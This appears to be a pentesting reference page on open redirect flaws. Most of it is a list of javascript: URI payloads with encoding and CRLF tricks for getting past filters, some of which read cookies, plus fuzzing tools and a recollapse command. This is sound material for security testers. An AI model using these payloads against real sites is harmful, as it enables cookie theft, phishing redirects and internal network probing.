Openredirect

Identification

The following is a list of common injection parameters:

https://book.hacktricks.xyz/pentesting-web/open-redirect#common-injection-parameters

Redirect to localhost or arbitrary domains

- Localhost

Try reaching localhost, potentially identify internal open ports:

Wordlist: https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass#localhost

- Arbitrary domains

Use different encoding formats to bypass the regex.

Examples:

Open Redirect to XSS

Basic payload, javascript code is executed after "javascript:"

javascript:alert(1)

Bypass "javascript" word filter with CRLF

java%0d%0ascript%0d%0a:alert(0)

Javascript with "://" (Notice that in JS "//" is a line coment, so new line is created before the payload). URL double encoding is needed

This bypasses FILTER_VALIDATE_URL os PHP

javascript://%250Aalert(1)

Variation of "javascript://" bypass when a query is also needed (using comments or ternary operator)

javascript://%250Aalert(1)//?1
javascript://%250A1?alert(1):0

Others

%09Jav%09ascript:alert(document.domain)
javascript://%250Alert(document.location=document.cookie)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
javascript://%0aalert(1)
<>javascript:alert(1);
//javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1);
/javascript:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1);
javascript:alert(1)
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript:prompt(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/
";alert(0);//

Tools

- Fuzzing Lists

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect/Intruder

- Oralyzer

https://github.com/r0075h3ll/Oralyzer

- Recollapse

https://github.com/0xacb/recollapse

Once obtained an openredirect, if we want to redirect to a malicious site, we can generate a wordlist that will try to bypass regex.

recollapse -e 1 -p 1,2,4 -r 10-11 https://legit.example.com

PreviousCSV InjectionNextPrototype Pollution

Last updated